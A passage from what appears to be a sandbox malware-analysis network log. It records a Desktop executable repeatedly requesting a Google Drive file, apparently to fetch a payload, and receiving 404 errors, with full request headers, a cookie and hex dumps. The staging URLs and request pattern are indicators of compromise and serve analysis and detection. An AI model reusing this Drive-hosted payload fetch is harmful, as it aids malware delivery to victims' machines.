                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.11.2049795142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:41 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:42 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5SHfOai1a0h7QW1V-BQfkOms-9u5QPqmXUzlupK8-GYJHLCAp0Fcaw8L5dmHc999FG
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:41 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-tpo13ul6SnSk2J4xPFQsHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 36 6d 61 5f 37 70 44 64 35 32 5a 61 64 49 4e 62 54 55 56 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="M6ma_7pDd52ZadINbTUVQw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.11.2049796142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:52 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:52 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:52 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-jsuVxbN-1PPKQ9QnzyoD-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.11.2049797142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:36:52 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:36:53 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4rpgtBfhYJB1A2KOau2u4CO-QRuHFjT_6hYVOEdy7y6IWSG3VOcTAoCXXnwOQqIbjd
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:36:53 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-bu_VVRdt6hU3qlDZVPM7fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:36:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 7a 35 4e 64 5a 32 61 37 68 6e 64 6e 5a 32 69 30 75 2d 77 54 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Lz5NdZ2a7hndnZ2i0u-wTA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.11.2049798142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:03 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:03 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:03 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-pygP1nTF1O9AEJIRsT2F2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.11.2049799142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:04 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:04 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7Wtk9gHFrryruSlyIDc4g21IdKj_2V246s1RBlhnI9JYQz1PfjSiIMqY8kmnX-JhxE
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:04 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-z0XLASyq9bl-uqtYbMOkmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 37 59 55 67 30 52 43 4e 34 30 38 30 65 70 64 2d 46 64 65 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D7YUg0RCN4080epd-Fdecw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          54192.168.11.2049800142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:14 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:14 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:14 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-RrmexLNZZp86gaxtuYPiyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          55192.168.11.2049801142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:15 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:15 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgT3RiN9ZxCtdSWdsf14TfbGiPZL38YNsLWgeMIBhPPTBA-DwoktkUs6bz4Xg-LUbdT8y5WTUBk
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:15 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-drEtOWCVekWEL3C9TKVEBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:15 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 75 35 37 2d 4d 69 6e 31 68 41 6e 56 37 6d 64 2d 32 58 6a 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Vu57-Min1hAnV7md-2XjdA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          56192.168.11.2049802142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:25 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
